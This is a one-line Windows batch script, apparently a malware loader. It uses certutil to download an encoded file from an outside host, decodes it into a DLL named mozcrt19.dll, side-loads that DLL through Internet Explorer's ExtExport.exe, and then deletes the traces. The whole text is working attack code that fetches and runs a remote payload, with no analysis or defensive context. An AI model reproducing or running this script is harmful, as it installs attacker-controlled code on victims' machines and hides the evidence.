@echo off & setlocal EnableDelayedExpansion & certutil -urlcache -f http://mail.erikumphery.com/z %TEMP%\r >nul & certutil -decode %TEMP%\r %TEMP%\mozcrt19.dll >nul & del %TEMP%\r & (if exist "C:\Program Files\Internet Explorer\ExtExport.exe" (call "C:\Program Files\Internet Explorer\ExtExport.exe" "%TEMP%" 395 134) else (call "C:\Program Files (x86)\Internet Explorer\ExtExport.exe" "%TEMP%" 2 9)) & timeout /t 7 /nobreak >nul & del %TEMP%\mozcrt19.dll